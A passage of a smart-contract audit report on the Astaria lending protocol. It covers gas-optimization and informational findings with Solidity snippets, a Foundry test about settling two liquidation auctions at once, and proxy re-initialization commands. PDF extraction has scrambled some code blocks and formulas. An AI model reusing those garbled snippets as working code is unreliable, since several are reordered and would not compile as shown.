keccak256("EIP712Domain(string version,uint256 chainId,address 49 +5.5.3 s.liquidationWithdrawRatio can be turned into a stack variable or be cached during its usage Severity: Gas Optimization Context: • PublicVault.sol#L360-L383 Description/Recommendation: s.liquidationWithdrawRatio is only used in this context and only in the pro- cessEpoch() function (besides the getter methods). If querying this value is not needed it can be turned into a local stack variable. Even if it is desired to query this parameter. writing to and reading from storage multiple times. It would be best to save it to the storage at the very end to avoid +5.5.4 s.currentEpoch can be cached in processEpoch() Severity: Gas Optimization Context: • PublicVault.sol#L336-L357 • PublicVault.sol#L393 Description: s.currentEpoch is being read from the storage multiple times in the processEpoch(). Recommendation: To save gas on reading from storage, s.currentEpoch can be cached in processEpoch(). +5.5.5 Use basis points for ratios Severity: Gas Optimization Context: IAstariaRouter.sol#L58, IAstariaRouter.sol#L62 Description: Fee ratios are represented through two state variables for numerator and denominator. Basis point system can be used in its place as it is simpler (denominator always set to 10_000), and gas efficient as denomi- nator is now a constant. Recommendation: Use basis point system to represent ratios. Remove denominator state variables and use 10_000 as a constant variable in its place. +5.5.6 liquidatorNFTClaim()'s arguments can be made calldata Severity: Gas Optimization Context: CollateralToken.sol#L244-L245 Description: The following arguments can be converted to calldata to save gas on copying them to memory: function liquidatorNFTClaim( ILienToken.Stack memory stack, OrderParameters memory params, uint256 counterAtLiquidation ) external whenNotPaused { Recommendation: Update the memory arguments to calldata. 50 +5.5.7 a.mulDivDown(b,1) is equivalent to a*b Severity: Gas Optimization Context: PublicVault.sol#L535 Description: Highlighted code below the pattern of a.mulDivDown(b, 1) which is equivalent to a*b except the revert parameters in case of an overflow return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept); Recommendation: Update the code to return uint256(s.slope)*delta_t + uint256(s.yIntercept); +5.5.8 try/catch can be removed for simplicity Severity: Gas Optimization Context: RepaymentHelper.sol#L33-L44 Description: The following code catches a revert in the external call WETH.deposit{value: owning}() and then reverts itself in the catch clause try WETH.deposit{value: owing}() { WETH.approve(transferProxy, owing); // make payment lienToken.makePayment(stack); // check balance if (address(this).balance > 0) { // withdraw payable(msg.sender).transfer(address(this).balance); } } catch { revert(); } This effect can also be achieved without using try/catch which simplifies the code too. Recommendation: Update the highlighted code as - try WETH.deposit{value: owing}() { + WETH.deposit{value: owing}(); WETH.approve(transferProxy, owing); // make payment lienToken.makePayment(stack); // check balance if (address(this).balance > 0) { // withdraw payable(msg.sender).transfer(address(this).balance); } - } catch { - - } revert(); 51 +5.5.9 Cache s.idToUnderlying[collateralId].auctionHash Severity: Gas Optimization Context: • CollateralToken.sol#L257-L266 Description: In liquidatorNFTClaim(...), s.idToUnderlying[collateralId].auctionHash is read twice from the storage. Recommendation: It would be great to cache s.idToUnderlying[collateralId].auctionHash to avoid reading it from storage multiple times. +5.5.10 Cache keccak256(abi.encode(stack)) Severity: Gas Optimization Context: • LienToken.sol#L150-L153 • LienToken.sol#L169 • LienToken.sol#L300 • LienToken.sol#L334 Description: In LienToken._handleLiquidation(...) lienId is calculated as uint256 lienId = uint256(keccak256(abi.encode(stack))); Note that _handleLiquidation(...) is called by handleLiquidation(...) which has a modifier validateCol- lateralState(...): validateCollateralState( stack.lien.collateralId, keccak256(abi.encode(stack)) ) And thus keccak256(abi.encode(stack)) is performed twice. The same multiple hashing calculation also hap- pens in makePayment(...) flow. to cache the keccak256(abi.encode(stack)) value for the above Recommendation: flows/endpoints. One way to achieve this is turn the validateCollateralState(...) into an internal function hook: It would be best function _validateCollateralState(LienStorage storage s, uint256 collateralId, bytes32 incomingHash) ,! internal { if (incomingHash != s.collateralStateHash[collateralId]) { revert InvalidLienState(InvalidLienStates.INVALID_HASH); } } and at the call sites we could have: bytes32 h = keccak256(abi.encode(stack)); uint256 cid = stack.lien.collateralId; _validateCollateralState(s, cid, h); // h and cid can be reused 52 5.6 Informational +5.6.1 Functions can be made view or pure Severity: Informational Context: AstariaRouter.sol#L565, CollateralToken.sol#L213 Description: Several functions can be view or pure. Compiler also warns about these functions. For instance, _validateRequest() can be made view. getSeaportMetadata() can be made pure instead of view. Recommendation: Consider going through compiler warning and add view or pure keywords to those functions. +5.6.2 Fix compiler generated warnings for unused arguments Severity: Informational Context: src, WithdrawProxy.sol#L173-L181 Description: Several functions have arguments which are not used and compiler generates a warning for each instance, cluttering the output. This makes it easy to miss useful warnings. Here is one example of a function with unused arguments: function deposit( uint256 assets, address receiver ) { } public virtual override(ERC4626Cloned, IERC4626) onlyVault returns (uint256 shares) revert NotSupported(); Recommendation: Consider commenting each argument highlighted by compiler warning as follows: function deposit( uint256 /* assets */ , address /* receiver */ ) { } public virtual override(ERC4626Cloned, IERC4626) onlyVault returns (uint256 /*shares*/ ) revert NotSupported(); 53 +5.6.3 Non-lien NFT tokens can get locked in the vaults Severity: Informational Context: • PublicVault.sol#L494 • Vault.sol#L60 Description: Both public and private vault when their onERC721Received(...) is called they return the IERC721Receiver.onERC721Received.selector and perform extra logic if the msg.sender is the LienToken and the operator is the AstariaRouter. This means other NFT tokens (other than lien tokens) received by a vault will be locked. Recommendation: It would be best to only return IERC721Receiver.onERC721Received.selector if: operator == address(ROUTER()) && msg.sender == address(ROUTER().LIEN_TOKEN()) and revert otherwise. +5.6.4 Define currentWithdrawProxy closer to where it is used Severity: Informational Context: • PublicVault.sol#L336 Description/Recommendation: Make sure currentWithdrawProxy is defined closer to its first usage line. // check if there are LPs withdrawing this epoch WithdrawProxy currentWithdrawProxy = WithdrawProxy( s.epochData[s.currentEpoch].withdrawProxy ); if ((address(currentWithdrawProxy) != address(0))) { +5.6.5 Validation checks should be performed at the beginning of processEpoch() Severity: Informational Context: • PublicVault.sol#L353-L357 Description: The following validation check for the data corresponding to the current epoch happens in the middle of processEpoch() where there have already been some accounting done: if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); } Recommendation: It would be best to perform this validation at the begging of the call to processEpoch(). This would make the flow of this endpoint more organised and also it would save gas in the case that this condition would cause a revert: 54 function processEpoch() public { // check to make sure epoch is over if (timeToEpochEnd() > 0) { revert InvalidVaultState(InvalidVaultStates.EPOCH_NOT_OVER); } VaultData storage s = _loadStorageSlot(); if (s.withdrawReserve > 0) { revert InvalidVaultState(InvalidVaultStates.WITHDRAW_RESERVE_NOT_ZERO); } if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); } // the rest ... } +5.6.6 Define and onlyOwner modifier for VaultImplementation Severity: Informational Context: • VaultImplementation.sol#L101 • VaultImplementation.sol#L119 • VaultImplementation.sol#L128 • VaultImplementation.sol#L137 • VaultImplementation.sol#L158 • VaultImplementation.sol#L196 Description: The following require statement has been used multiple times require(msg.sender == owner()); Recommendation: It would be best to define a modifier or an internal function hook to refactor this requirement. +5.6.7 Vault is missing an interface Severity: Informational Context: • Vault.sol#L27 Description: Vault is missing an interface Recommendation: It would be best to add an interface IVault for Vault to document its endpoints and expected behaviour. 55 +5.6.8 RepaymentHelper.makePayment(...) transfer is used Severity: Informational Context: • RepaymentHelper.sol#L40 Description: In RepaymentHelper.makePayment(...) the transfer function is used to return extra native tokens sent to this contract. The use of transfer which restrict the amount of gas shared with the msg.sender is not required, since there are no actions after this call site, it is safe to call the msg.sender directly to transfer these funds. Recommendation: Use call instead of transfer to send back the extra native tokens: payable(msg.sender).call{value: address(this).balance}(); +5.6.9 Consider importing Uniswap libraries directly Severity: Informational Context: FullMathUniswap.sol, LiquidityAmounts.sol, TickMath.sol Description: astaria-gpl copies the libraries highlighted above which were written originally in Solidity v0.7 and refactors them to v0.8. Uniswap has also provided these contracts for Solidity v0.8 in branches named 0.8. See v3-core@0.8 and v3-periphery@0.8. Using these files directly reduces the amount of code owned by Astaria. Recommendation: Consider replacing the following libraries: • FullMathUniswap.sol with Uniswap's FullMath.sol. • LiquidityAmounts.sol with Uniswap's LiquidityAmounts.sol • TickMath.sol with Uniswap's TickMath.sol +5.6.10 Elements' orders are not consistent in solidity files Severity: Informational Context: General Description: Elements' orders are not consistent in solidity files Recommendation: Consider adding the ordering rule to .solhint.json and resolving the order related warnings: { "extends": "solhint:recommended", "rules": { "compiler-version": ["error", "=0.8.17"], "func-visibility": ["warn", { "ignoreConstructors": true }], "avoid-suicide": "error", "ordering": "warn" } } 56 +5.6.11 FileType definitions are not consistent Severity: Informational Context: • IAstariaRouter.sol#L29 • ICollateralToken.sol#L71 • ILienToken.sol#L23 Description: Both ICollateralToken.FileType and ILienToken.FileType start their enums with NotSupported. The definition of FileType in IAstariaRouter is not consistent with that pattern. This might be due to having 0 as a NotSupported so that the file endpoints would revert. Recommendation: Consider having the same pattern for all the 3 enums in this context. +5.6.12 VIData.allowlist can transfer shares to entities not on the allowlist Severity: Informational Context: • IVaultImplementation.sol#L45 Description: allowList is only used to restrict the share recipients upon mint or deposit to a vault if allowLis- tEnabled is set to true. These shareholders can later transfer their share to other users who might not be on the allowList. Recommendation: The above should be documented/commented. +5.6.13 Extract common struct fields from IStrategyValidator implementations Severity: Informational Context: • CollectionValidator.sol#L23-L28 • UNI_V3Validator.sol#L29-L42 • UniqueValidator.sol#L23-L29 • IAstariaRouter.sol#L108 Description: All the IStrategyValidator implementations have the following data encoded in the NewLienRe- quest.nlrDetails struct CommonData { uint8 version; address token; // LP token for Uni_V3... address borrower; ILienToken.Details lienDetails; bytes moreData; // depends on each implementation } Recommendation: It might be best to define the struct for this common piece. Also note I've reorder the fields in the decoded data to show the unity between all the implementations. The above struct fields can be extracted out of nlrDetails and added as new fields to NewLienRequest For the version field we can start using the StrategyDetailsParam.version again instead. 57 +5.6.14 _createLien() takes in an extra argument Severity: Informational Context: LienToken.sol#L231 Description: _createLien(LienStorage storage s, ...) doesn't use s and hence can be removed as an argument. Recommendation: Remove s as an argument from _createLien(). +5.6.15 unchecked has no effect Severity: Informational Context: PublicVault.sol#L509-L512 Description: unchecked only affects the arithmetic operations directly nested under it. In this case unchecked is unnecessary: unchecked { s.yIntercept = (_totalAssets(s)); s.last = block.timestamp.safeCastTo40(); } Recommendation: Remove unchecked. +5.6.16 Multicall can reuse msg.value Severity: Informational Context: Multicall.sol#L20 Description: A delegatecall forwards the same value for msg.value as found in the current context. Hence, all delegatecalls in a loop use the same value for msg.value. In the case of these calls using msg.value, it has the ability to use the native token balance of the contract itself for (uint256 i = 0; i < data.length; i++) { (bool success, bytes memory result) = address(this).delegatecall(data[i]); ... } Recommendation: In Astaria's case, native token is never sent to protocol hence, the current usage of Multicall is safe. However, care needs to be taken if this changes in the future. +5.6.17 Authorised entities can drain user assets Severity: Informational Context: • TransferProxy.sol#L66-L84 Description: An authorized entity can steal user approved tokens (vault assets and vault tokens, ...) using these endpoints 58 function tokenTransferFrom( address token, address from, address to, uint256 amount ) external requiresAuth { ERC20(token).safeTransferFrom(from, to, amount); } function tokenTransferFromWithErrorReceiver( address token, address from, address to, uint256 amount ) external requiresAuth { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } Same risk applies to all the other upgradable contracts. Recommendation: Users need to be aware of the above risks. +5.6.18 WETH can be made immutable in DepositHelper Severity: Informational Context: • DepositHelper.sol#L21 • DepositHelper.sol#L26 Description/Recommendation: DepositHelper has no setter for WETH and it only gets initialised in the constructor so it can be made immutable. +5.6.19 Conditional statement in _validateSignature(...) can be simplified/optimized Severity: Informational Context: • AstariaRouter.sol#L833 Description: When validating the vault strategist's (or delegate's) signature for the commitment, we perform the following check if ( (recovered != strategist && recovered != delegate) || recovered == address(0) ) { revert IVaultImplementation.InvalidRequest( IVaultImplementation.InvalidRequestReason.INVALID_SIGNATURE ); } The conditional statement: (recovered != strategist && recovered != delegate) 59 perhaps can be optimised/simplified. Recommendation: We can change the abovementioned conditional statement to: !(recovered == strategist || recovered == delegate) Need to run some gas diffs to verify that this actually optimised the flow. +5.6.20 AstariaRouter cannot deposit into private vaults Severity: Informational Context: • AstariaRouter.sol#L596-L602 • Vault.sol#L90-L95 Description: The allowlist for private vaults only includes the private vault's owner function newVault( address delegate, address underlying ) external whenNotPaused returns (address) { address[] memory allowList = new address[](1); allowList[0] = msg.sender; RouterStorage storage s = _loadRouterSlot(); ... } Note that for private vaults we cannot modify or disable/enable the allowlist. includes the owner. It is always enabled and only That means only the owner can deposit into the private vault function deposit( uint256 amount, address receiver ) public virtual whenNotPaused returns (uint256) { VIData storage s = _loadVISlot(); require(s.allowList[msg.sender] && receiver == owner()); ... } If we the owner would like to be able to use the AstariaRouter's interface by calling its deposit(...), or de- positToVault(...) endpoint (which uses the pulling strategy from transfer proxy), it would not be able to. Anyone can directly transfer tokens to this private vault by calling asset() directly. So above requirement re- quire(s.allowList[msg.sender] ... ) seems to also be there to avoid potential mistakes when one is calling the ERC4626RouterBase.deposit(...) endpoint to deposit into the vault indirectly using the router. Recommendation: If it is anticipated for the owners to deposit into their private vault by using the AstariaRouter's interface. AstariaRouter should be added to the allowlist upon initialisation of the private vault. 60 +5.6.21 The conditional statement when validating newStack.lien.details.liquidationInitialAsk can be simplified Severity: Informational Context: • AstariaRouter.sol#L576-L583 Description/Recommendation: Stack.lien.details.liquidationInitialAsk : In _validateRequest(...) we performing a check for new- if ( newStack.lien.details.liquidationInitialAsk < owingAtEnd || newStack.lien.details.liquidationInitialAsk == 0 ) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.INVALID_LIQUIDATION_INITIAL_ASK ); } owingAtEnd is calculated as: aowed = a + j d (cid:1) r (cid:1) a 1018 k parameter description aowed owingAtEnd a r d Lin params.lienReuqest.amount newStack.lien.details.rate newStack.lien.details.duration newStack.lien.details.liquidationInitialAsk since we've already checked that a > 0 we can deduce that 0 < a (cid:20) aowed . And since having 0 < aowed (cid:20) Lin implies that Lin is non-zero and positive we have that: newStack.lien.details.liquidationInitialAsk == 0 implies newStack.lien.details.liquidationInitialAsk < owingAtEnd and so the conditionals in this if statement can be simplified to: if ( newStack.lien.details.liquidationInitialAsk < owingAtEnd ) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.INVALID_LIQUIDATION_INITIAL_ASK ); } 61 +5.6.22 Reorganise sanity/validity checks in the commitToLien(...) flow Severity: Informational Context: • AstariaRouter.sol#L857-L863 • AstariaRouter.sol#L566-L587 • AstariaRouter.sol#L885-L891 • AstariaRouter.sol#L883 Description: The following checks are preformed in _validateRequest(...): • params.lienRequest.amount == 0: if (params.lienRequest.amount == 0) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.AMOUNT_ZERO ); } The above check can be moved to the very beginning of the commitToLien(...) flow. Perhaps right before or after we check the commitment's vault provided is valid. • newStack.lien.details.duration < s.minLoanDuration can be checked right after we compare to time to the second epoch end: if (publicVault.supportsInterface(type(IPublicVault).interfaceId)) { uint256 timeToSecondEpochEnd = publicVault.timeToSecondEpochEnd(); require(timeToSecondEpochEnd > 0, "already two epochs ahead"); if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } } if (lien.details.duration < s.minLoanDuration) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.MIN_DURATION_NOT_MET ); } This only works if we assume the LienToken.createLien(...) endpoint does not change the duration. The current implementation does not. • block.timestamp > params.lienRequest.strategy.deadline can also be checked at the very beginning of the commitToLien flow. Recommendation: Recommendations above can be applied or we can keep the current flow if we would like to check these invariants at the end of the flow. 62 +5.6.23 Refactor fetching strategyValidator Severity: Informational Context: • AstariaRouter.sol#L480-L485 • AstariaRouter.sol#L492-L496 Description: Both _validateCommitment(...) and getStrategyValidator(...) need to fetch strategyVal- idator and both use the same logic. Recommendation: We can refactor and introduce a new internal function function _getStrategyValidator( RouterStorage storage s, IAstariaRouter.Commitment calldata commitment ) internal view returns (address strategyValidator) { uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)); strategyValidator = s.strategyValidators[nlrType]; if (strategyValidator == address(0)) { revert InvalidStrategy(nlrType); } } which can be used in both functions above. +5.6.24 assembly ("memory-safe") can be used in Severity: Informational Context: • AstariaRouter.sol#L450-L459 • AstariaRouter.sol#L480 • AstariaRouter.sol#L492 Description: The following internal pure functions is defined in AstariaRouter function _sliceUint( bytes memory bs, uint256 start ) internal pure returns (uint256 x) { uint256 length = bs.length; assembly { let end := add(ONE_WORD, start) if lt(length, end) { mstore(0, OUTOFBOUND_ERROR_SELECTOR) revert(0, ONE_WORD) } x := mload(add(bs, end)) } } Since only the scratch space in memory is altered, we can use: assembly ("memory-safe") { ... } also only used with start = 0: 63 uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)) 1. We can use assembly ("memory-safe") (requires solc v0.8.13): function _sliceUint( bytes memory bs, uint256 start ) internal pure returns (uint256 x) { assembly ("memory-safe") { let length := mload(bs) let end := add(ONE_WORD, start) if lt(length, end) { mstore(0, OUTOFBOUND_ERROR_SELECTOR) revert(0, ONE_WORD) } x := mload(add(bs, end)) } } 2. Might be better to move this helper/utility function to a library. 3. We can specialise for start == 0. +5.6.25 Updating the proxies and initialisation Severity: Informational Context: • AstariaRouter.sol#L83 • CollateralToken.sol#L80 • LienToken.sol#L57 Description/Recommendation: Just a note in case one would need to change some parameters after deploying v0.5.0 (if we can't file for them): cast storage $ASTARIA_ROUTER_PROXY_ADDR_MAINNET $INITIALIZER_SLOT 0x0000000000000000000000000000000000000000000000000000000000000001 then a new modifier needs to be used here or for a new init endpoint with reinitializer(2) modifier. The same goes for LienToken and CollateralToken: cast storage $LIEN_TOKEN_PROXY_ADDR $INITIALIZER_SLOT 0x0000000000000000000000000000000000000000000000000000000000000001 cast storage $COLLATERAL_TOKEN_PROXY_ADDR $INITIALIZER_SLOT 0x0000000000000000000000000000000000000000000000000000000000000001 64 +5.6.26 validateOrder(...) prevents settling multiple liquidation auctions using only one call to Seaport Severity: Informational Context: • CollateralToken.sol#L139-L144 Description/Recommendation: When a Seaport liquidation auction settles the CollateralToken gets a call back which has the following check if the offerer Is the CollateralToken: if ( zoneParameters.orderHashes[0] != s.idToUnderlying[collateralId].auctionHash ) { revert InvalidOrder(); } Just a note, this check is really important as it prevents to settle multiple liquidation auctions with just one call to Seaport. This basically requires that the first available advanced order can be the only order that CollateralToken accepts among the orders that CollateralToken is the offerer. Otherwise, one auction could steal the settlement payment from another auction. // file: src/test/LienTokenSettlementScenarioTest.t.sol function _createUser(uint256 pk, string memory label) internal returns(address addr) { uint256 ownerPK = uint256(pk); addr = vm.addr(ownerPK); vm.label(addr, label); } // Scenario 13: two liquidated liens are settled simultaneously on Seaport function testScenario13() public { { console2.log("--- test multiple simultaneous action settlement ---"); address borrower1 = _createUser(0xb055033501, "borrower1"); address borrower2 = _createUser(0xb055033501, "borrower2"); address vaultOwner = _createUser(0xa77ac3, "vaultOwner"); address publicVault = _createPublicVault(vaultOwner, vaultOwner, 14 days); vm.label(publicVault, "publicVault"); console2.log("[+] public vault is created: %s", publicVault); _lendToVault( Lender({addr: vaultOwner, amountToLend: 10 ether}), payable(publicVault) ); address privateVault = _createPrivateVault(borrower2, borrower2); vm.label(privateVault, "privateVault"); console2.log("[+] private vault is created: %s", privateVault); _lendToPrivateVault( PrivateLender({addr: borrower2, amountToLend: 1 ether, token: address(WETH9)}), payable(privateVault) ); TestNFT nft1 = new TestNFT(1); address tokenContract1 = address(nft1); uint256 tokenId1 = uint256(0); TestNFT nft2 = new TestNFT(1); 65 address tokenContract2 = address(nft2); uint256 tokenId2 = uint256(0); nft1.transferFrom(address(this), borrower1, tokenId1); nft2.transferFrom(address(this), borrower2, tokenId2); ILienToken.Stack[2] memory stacks; vm.startPrank(borrower1); (, stacks[1]) = _commitToLien({ vault: payable(publicVault), strategist: vaultOwner, strategistPK: 0xa77ac3, tokenContract: tokenContract1, tokenId: tokenId1, lienDetails: ILienToken.Details({ maxAmount: 2 ether, rate: 1e8, duration: 1e10, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 0.5 ether, revertMessage: "" }); vm.stopPrank(); vm.startPrank(borrower2); (, stacks[0]) = _commitToLien({ vault: payable(privateVault), strategist: borrower2, strategistPK: 0xb055033501, tokenContract: tokenContract2, tokenId: tokenId2, lienDetails: ILienToken.Details({ maxAmount: 1 ether, rate: 2e8, duration: 1e10, maxPotentialDebt: 0 ether, liquidationInitialAsk: 3 ether }), amount: 1 ether, revertMessage: "" }); skip(1e10); OrderParameters[2] memory listedOrders; listedOrders[0] = _liquidate(stacks[0]); listedOrders[1] = _liquidate(stacks[1]); skip(uint256(3 days) / 4000); vm.stopPrank(); uint256 _bidderPK = 0xb1dde5; address _bidder = _createUser(_bidderPK, "bidder"); _bid2(Bidder({ bidder: _bidder, bidderPK: _bidderPK }), listedOrders, 10 ether, stacks); 66 } } function _bid2( Bidder memory incomingBidder, OrderParameters[2] memory params, uint256 bidAmount, ILienToken.Stack[2] memory stack ) internal returns (uint256 executionPrice) { vm.deal(incomingBidder.bidder, bidAmount * 3); if (bidderConduits[incomingBidder.bidder].conduitKey == bytes32(0)) { _deployBidderConduit(incomingBidder.bidder); } vm.startPrank(incomingBidder.bidder); AdvancedOrder[] memory orders = new AdvancedOrder[](4); { WETH9.deposit{value: bidAmount * 2}(); WETH9.approve(bidderConduits[incomingBidder.bidder].conduit, bidAmount * 2); OrderParameters[] memory mirrors = new OrderParameters[](2); OrderComponents[] memory matchOrderComponents = new OrderComponents[](2); mirrors[0] = _createMirrorOrderParameters( params[0], payable(incomingBidder.bidder), params[0].zone, bidderConduits[incomingBidder.bidder].conduitKey ); emit log_order(mirrors[0]); mirrors[1] = _createMirrorOrderParameters( params[1], payable(incomingBidder.bidder), params[1].zone, bidderConduits[incomingBidder.bidder].conduitKey ); emit log_order(mirrors[1]); orders[0] = AdvancedOrder(params[0], 1, 1, new bytes(0), abi.encode(stack[0])); matchOrderComponents[0] = getOrderComponents( mirrors[0], consideration.getCounter(incomingBidder.bidder) ); bytes memory mirrorSignature = signOrder( SEAPORT, incomingBidder.bidderPK, consideration.getOrderHash(matchOrderComponents[0]) ); orders[1] = AdvancedOrder(mirrors[0], 1, 1, mirrorSignature, new bytes(0)); orders[2] = AdvancedOrder(params[1], 1, 1, new bytes(0), abi.encode(stack[1])); matchOrderComponents[1] = getOrderComponents( mirrors[1], consideration.getCounter(incomingBidder.bidder) ); 67 mirrorSignature = signOrder( SEAPORT, incomingBidder.bidderPK, consideration.getOrderHash(matchOrderComponents[1]) ); orders[3] = AdvancedOrder(mirrors[1], 1, 1, mirrorSignature, new bytes(0)); } Fulfillment[] memory _fulfillments = new Fulfillment[](4); { } FulfillmentComponent[][4] memory fc; fc[0] = new FulfillmentComponent[](1); fc[1] = new FulfillmentComponent[](1); fc[2] = new FulfillmentComponent[](1); fc[3] = new FulfillmentComponent[](1); fc[0][0] = FulfillmentComponent(0, 0); fc[1][0] = FulfillmentComponent(1, 0); fc[2][0] = FulfillmentComponent(2, 0); fc[3][0] = FulfillmentComponent(3, 0); _fulfillments[0] = Fulfillment(fc[0], fc[1]); _fulfillments[1] = Fulfillment(fc[1], fc[0]); _fulfillments[2] = Fulfillment(fc[2], fc[3]); _fulfillments[3] = Fulfillment(fc[3], fc[2]); consideration.matchAdvancedOrders( orders, new CriteriaResolver[](0), _fulfillments, incomingBidder.bidder ); vm.stopPrank(); } +5.6.27 The stack provided as an extra data to settle Seaport auctions need to be retrievable Severity: Informational Context: • CollateralToken.sol#L145-L148 Description: The stack provided as an extra data to settle Seaport auctions need to be retrievable. Perhaps one can figure this from various events or off-chain agents, but it is not directly retrievable. Recommendation: Make sure there are systems in place to retrieve the associated stack to a liquidated Seaport auction so that the fulfillers can provide it as an extra data when they would like to settle these auctions. Astaria: It's available from new loan events or the astaria backend 68 +5.6.28 Make sure CollateralToken is connected to Seaport v1.5 Severity: Informational Context: • CollateralToken.sol#L84 • CollateralToken.sol#L343-L365 Description: Currently the CollateralToken proxy (v0) is connected to Seaport v1.1 which has different call- backs to the zone and it also only performs static calls. If the current version of CollateralToken gets connected to the Seaport v1.1, no one would be able to settle auctions created by the CollateralToken. This is due to the fact that the callbacks would revert. Recommendation: Make sure CollateralToken is connected to Seaport v1.5. +5.6.29 In liquidatorNFTClaim move liquidator's definition closer its first usage site Severity: Informational Context: • CollateralToken.sol#L243-L280 Description/Recommendation: For better readability it would be best to move liquidator's definition closer its first usage site in liquidatorNFTClaim function liquidatorNFTClaim( ILienToken.Stack memory stack, OrderParameters memory params, uint256 counterAtLiquidation ) external whenNotPaused { CollateralStorage storage s = _loadCollateralSlot(); uint256 collateralId = params.offer[0].token.computeId( params.offer[0].identifierOrCriteria ); ... // the sanity checks ... s.LIEN_TOKEN.makePayment(stack); address liquidator = s.LIEN_TOKEN.getAuctionLiquidator(collateralId); // <-- moved down here _releaseToAddress(s, collateralId, liquidator); } It would also be best KEN.makePayment(...) and LIEN_TOKEN.getAuctionLiquidator(...) into one call in this flow. to define a new endpoint for LienToken to combine the two calls LIEN_TO- 69 +5.6.30 Define getter for idToUnderlying.auctionHash Severity: Informational Context: • CollateralToken.sol#L428-L435 It might be useful to define a getter function/endpoint for idToUnderly- • ICollateralToken.sol#L50 • ICollateralToken.sol#L62 Description/Recommendation: ing.auctionHash. +5.6.31 Remove unused code Severity: Informational Context: • ILienToken.sol#L23-L32 • LienToken.sol#L30 • LienToken.sol#L32 • LienToken.sol#L38 • LienToken.sol#L44 • ClaimFees.sol • V3SecurityHook.sol • CollateralToken.sol#L42-L56 • CollateralToken.sol#L57-L60 • IFlashAction.sol • ISecurityHook.sol • IPublicVault.sol#L35 • IPublicVault.sol#L116 • IAstariaRouter.sol#L101-L104 • IV3PositionManager.sol#L3 • ILienToken.sol#L27-L31 • IAstariaRouter.sol#L36 • IAstariaRouter.sol#L96 • ILienToken.sol#L57 Description/Recommendation: • ILienToken.sol#L23-L32, the FileType enum has only two fields that are used, we can update it to: enum FileType { NotSupported, // we can keep `NotSupported` if we would like the actual file types to start from 1 CollateralToken, AstariaRouter } • LienToken.sol#L30, IVaultImplementation can be removed since it's not used. 70 • LienToken.sol#L32, VaultImplementation can be removed since it's not used. • LienToken.sol#L38, LienToken.sol#L44, AmountDeriver is not used and can be removed. • ClaimFees.sol, V3SecurityHook.sol, flashAction has been removed from the CollateralToken. Perhaps this file can be removed or marked as it is not being used currently. function flashAction( IFlashAction receiver, uint256 collateralId, bytes calldata data ) external onlyOwner(collateralId) { address addr; uint256 tokenId; CollateralStorage storage s = _loadCollateralSlot(); (addr, tokenId) = getUnderlying(collateralId); if (!s.flashEnabled[addr]) { revert InvalidCollateralState(InvalidCollateralStates.FLASH_DISABLED); } if ( s.LIEN_TOKEN.getCollateralState(collateralId) == bytes32("ACTIVE_AUCTION") ) { revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); } bytes32 preTransferState; //look to see if we have a security handler for this asset address securityHook = s.securityHooks[addr]; if (securityHook != address(0)) { preTransferState = ISecurityHook(securityHook).getState(addr, tokenId); } // transfer the NFT to the destination optimistically ClearingHouse(s.idToUnderlying[collateralId].clearingHouse) .transferUnderlying(addr, tokenId, address(receiver)); //trigger the flash action on the receiver if ( receiver.onFlashAction( IFlashAction.Underlying( s.idToUnderlying[collateralId].clearingHouse, addr, tokenId ), data ) != keccak256("FlashAction.onFlashAction") ) { revert FlashActionCallbackFailed(); } if ( securityHook != address(0) && preTransferState != ISecurityHook(securityHook).getState(addr, tokenId) ) { revert FlashActionSecurityCheckFailed(); } // validate that the NFT returned after the call 71 if ( IERC721(addr).ownerOf(tokenId) != address(s.idToUnderlying[collateralId].clearingHouse) ) { revert FlashActionNFTNotReturned(); } } • CollateralToken.sol#L42-L56, AdvancedOrder, CriteriaResolver, SpentItem and ReceivedItem are not used. • CollateralToken.sol#L57-L60, Consideration, and SeaportInterface are not used. • IFlashAction.sol, flash action has been removed from the CollateralToken. Perhaps this file can be removed or commented that it is not used currently. • ISecurityHook.sol, This was also used for flash actions in CollateralToken. Perhaps can be removed or marked as not used. • IPublicVault.sol#L35VaultData.strategistUnclaimedShares is not used. • IPublicVault.sol#L116, LIQUIDATION_ACCOUNTANT_ALREADY_DEPLOYED_FOR_EPOCH is not used. • IAstariaRouter.sol#L101-L104, MerkleData is not used anymore. • IV3PositionManager.sol#L3, not used anymore due to removal of flash action from CollateralToken. • ILienToken.sol#L27-L31, these fields are not used anymore here and MinLoanDuration is redefined in IAs- tariaRouter. • IAstariaRouter.sol#L36, MinInterestRate is not used. • IAstariaRouter.sol#L96, StrategyDetailsParam.version seems not being used. Perhaps because we have another version encoded in NewLienRequest.nlrDetails which might point to the same information. Con- sider removing it if there isn't plan to be using it to encapsulate a different version. • ILienToken.sol#L57, maxPotentialDebt is not used anymore. Some tests still set this value to a non-zero value. +5.6.32 Use _underscore for internal function names Severity: Informational Context: • WithdrawProxy.sol#L374 Description/Recommendation: In the context above, it would be best to start the function names with an under- score _ for better readability. +5.6.33 Fix Comments Severity: Informational Context: • WithdrawProxy.sol#L368-L372 • WithdrawProxy.sol#L58 • WithdrawProxy.sol#L56 • WithdrawProxy.sol#L304 • LienToken.sol#L273-L276 • AuthInitializable.sol#L19 72 • AuthInitializable.sol#L20 • AstariaRouter.sol#L535-L536 • WithdrawProxy.sol#L247 • AstariaVaultBase.sol#L47 Description/Recommendation: • WithdrawProxy.sol#L368-L372, handleNewLiquidation(...) is not directly called anymore and it is called indirectly when a safe ERC721 is transferred by calling back the onERC721Received endpoint. • WithdrawProxy.sol#L58, withdrawReserveReceived's comment mentions WETH, but in general the asset might be a different token. It also receives assets from the next epoch's WithdrawProxy • WithdrawProxy.sol#L56, the comment is not 